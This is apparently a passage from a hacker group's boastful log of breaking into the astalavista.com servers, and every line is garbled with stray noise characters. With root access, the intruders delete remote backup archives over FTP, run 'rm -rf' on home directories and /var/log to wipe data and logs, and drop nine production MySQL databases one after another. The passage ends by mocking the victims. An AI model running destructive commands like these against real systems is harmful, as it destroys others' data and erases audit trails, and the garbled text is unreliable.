7 g- V' S* j, a+ F-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2; e6 ?0 ~" } S% c$ X C( `
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
6 p" v' { H6 x0 M-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
# w$ m: a) \! P' s1 r! k9 D-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
1 M0 R- e2 ]/ {) |1 e[snip]2 f; J9 h2 T4 W; t
226 Transfer complete.
# g) E. M0 Y& q; \7 Kftp> mdelete */ T [" D B1 q
ftp> ls -la- J* w+ K3 \" M3 S3 [! T% N* }; r
227 Entering Passive Mode (212,254,194,163,2,193)
) Y: b$ C. U; M: ?; D9 Z% w4 ]150 Opening BINARY mode data connection for ‘file list’.
7 h' b/ j! D$ d& p' g226 Transfer complete.# H% f2 e5 Q4 M
ftp>
6 E: Q- l4 H2 [# G
/ c! Q( }) Z& [sh-3.2# cd /home
! H9 e' v- e# |* d5 p7 }$ X9 Ssh-3.2# ls -la
5 U0 Z% ^5 h2 A9 f) Rtotal 120
" p, b& v; \1 U0 Q+ `1 edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
8 Z' i* j& I* [1 Fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* Q; T0 r$ \# T) J3 e/ W
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
9 c# s4 O" B- @1 S/ Q% z( n! A0 `-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( N S8 c: d' k3 A
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user, ^0 ~' L# ~5 A7 ?; D
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet0 J" X; n/ S3 A% f5 a
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
' o8 i4 [% k! ^! idrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
0 E" u R% j; tdrwx–x–x 10 com com 4096 Apr 28 12:40 com- F: ` J8 j; Z7 }* F4 t
drwxr-xr-x 2 root root 4096 May 17 2007 ftp2 w7 J6 f5 B; e5 Q: F( q+ F* b
drwx—— 3 jon jon 4096 Sep 21 2007 jon6 P: N5 Z9 {4 O7 ]/ L k! b+ `
drwx—— 2 root root 16384 Sep 11 2007 lost+found7 \: ?# R% x# t4 f; J
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
) s8 r; H8 ^4 N& \4 Y# m( Xdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
% X) X; H! d- I: N' U# bdrwx—— 2 jon jon 4096 Sep 15 2007 test4 ]6 f% s4 [- }8 a y
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp* x5 R+ S4 v% W' ~* M# W
6 n) P3 d X l; J0 e" Y
sh-3.2# rm -rf backup/
5 L8 P4 k- z% l% o' B3 ^sh-3.2# rm -rf backup.14161/
: j7 {. K2 e3 I+ V9 _( gsh-3.2# rm -rf ftp/* r, a9 M4 _: W( E# F7 V
sh-3.2# rm -rf jon/9 F) R% [& s: H% v) A) e. h
sh-3.2# rm -rf my/9 `9 n& ?0 [0 H8 |' [
sh-3.2# rm -rf mysqldata/
& @) _4 j5 Q, a' msh-3.2# rm -rf test/+ c" o7 U7 Y1 Q$ j* [" c$ \
sh-3.2# rm -rf tmp/5 X- T# H$ O8 j( ^7 N6 u- {! s
sh-3.2# cd ~5 a2 _. Q" F6 u$ x
sh-3.2# rm -rf *0 \6 b" h/ I3 j
sh-3.2# rm -rf /var/log/# s7 d* C$ {, K, d5 c- ]
rm: cannot remove directory `/var/log//proftpd’: Directory not empty) L% \0 o2 Q/ {: P. m6 q+ M
sh-3.2# rm -rf /home/*% B" ]7 j" G% }' A) f
sh-3.2# mysql3 J! ]7 Q8 B' _: q( a( Z
Welcome to the MySQL monitor. Commands end with ; or \g.
% M# S% X7 `( y) W( e) k: u$ C# jYour MySQL connection id is 4071569 I, ]/ c7 G3 Q% T1 z9 Q
Server version: 5.0.45-community-log MySQL Community Edition (GPL)5 Q# O3 Y6 t% D0 k8 C
, ~8 L6 F! t/ a: X" ]+ U4 {Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
$ x+ Y b1 I+ x* M: I; m
6 r" |0 }/ U' J6 f$ M9 M0 L- _0 qmysql> show databases;
; _5 l8 p1 T6 X; R+———————–+
1 A m6 j/ V1 z; l| Database |$ L8 Z; ? M3 B3 p. L9 h
+———————–+
" k' t& p8 H& i! T5 [| information_schema |
' A$ i! w( U; q5 B& K \2 H6 l| astanet_ads |- c6 X, v9 ^) J6 q. V. Y+ G- k. X
| astanet_mailing_lists |
$ l9 N0 {( R4 j* h1 |7 f| astanet_mediawiki |1 H! }3 Q/ F: J o- o7 m
| astanet_membersystem |) K5 g* n E$ Q* S4 c S
| com_contrexx |
# W- i* k. b! D* b# _8 E5 z) X* {# j| com_contrexx2 |
7 T2 p/ _8 H! Y| com_contrexx2_live |
4 R* m2 V. S6 W5 b" | D| da_roundcube |7 [8 }0 F; v. n$ ~
| dolphin |! a6 N) g- `& x, r6 Z# R W- B
| ideapool |
1 I8 f$ _; M$ l5 S| mysql |5 F# Y$ I: Q% S. {: r
| test |) j \& |, d# T7 I6 g$ a6 f( @
| yourmaster |
% L b2 J3 n* Z: `+———————–+
% G% H- e+ ~, c7 d7 f2 [14 rows in set (0.03 sec)
3 f8 ~' |3 `3 O6 U; k( b: _4 F# K* V: f1 O e# \
mysql> drop database astanet_membersystem;
# }3 F; {; a2 `1 a" pdroQuery OK, 46 rows affected (0.81 sec)2 s# q, R' D" q7 l) i1 T* c+ @
" Q. i# i- i! j% b Gmysql> drop database com_contrexx;
* T u: j' x' |" n( b8 GQuery OK, 211 rows affected (2.72 sec)$ q' ]& \2 J! O7 N! G
E; m4 m2 _. ?7 e; \" y$ ymysql> drop database com_contrexx2;$ R( K; X4 v' X+ m
Query OK, 237 rows affected (2.23 sec)
& u% h T8 |6 ]# \$ M% S. I' D% L: g" F" f
mysql> drop database com_contrexx2_live;
6 M% ]( u( p" K& XQuery OK, 227 rows affected (7.63 sec)
' H8 ^) r$ c8 N: n; F+ s
6 C- e* Y! |& ~; ?% Bmysql> drop database ideapool;. D& l( B+ {$ A
Query OK, 69 rows affected (0.19 sec)
5 @0 s8 S' @; ~5 d! A( c% [1 L: A* h! O- h# d% d! }
mysql> drop database yourmaster;6 l+ \% v% |# v9 l! @3 G' K
Query OK, 158 rows affected (0.55 sec)$ K+ T0 Q, ^) ]3 z
" n, g5 q- o# S! C4 x/ H0 P0 l/ hmysql> drop database astanet_ads;
: {# h$ W/ e, J! V ~5 ^0 W$ z, ]Query OK, 9 rows affected (0.11 sec)
# B5 e) n$ Z: @, } c; Z) P+ I+ W3 K9 D; E# q8 T. K- V
mysql> drop database astanet_mailing_lists;
, f, @* X3 P, K3 yQuery OK, 24 rows affected (1.47 sec): o* m( h- U4 j$ d
9 d* O3 _" J- \mysql> drop database astanet_mediawiki;
, E& ~) J3 b1 E5 A j F0 EQuery OK, 31 rows affected (0.51 sec)
; z% m2 }2 I8 y8 A# w$ d' p4 ]+ q( ?7 C( k8 u1 v" z
mysql> show databases;
( K: R; k0 F4 _, O; j [5 @5 J$ u+——————–+
3 ~$ X2 K2 R5 p. X" E7 d| Database |
" C3 i6 Z" S; r3 G+——————–+
3 @6 A! O! n) l8 W% || information_schema |
2 i. O' G A' G+ d* P7 y| da_roundcube |- t1 `) \$ K; T& w- |6 {# s& t
| dolphin |
' b7 X+ `0 p5 `! o5 n| mysql |
6 Q2 a' K2 N# m| test | R, d1 O+ X8 C6 Q% T
+——————–+
4 N$ q, P& W: J/ ?0 S c6 a+ L* X5 rows in set (0.00 sec)' q Y% Q0 E9 h% R9 d4 r
; x( K8 X% `6 V5 F `
What a journey! We’re not sure exactly why the “Terminator” had any influence on
- L/ `( _5 x/ d( k+ ?; r8 G% [their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
% u) d; ^; O8 ?7 Y+ t# Rwrong to say this pack of morons *wont be back*.! [3 L# E. O* ]. c5 C" k% n7 O
|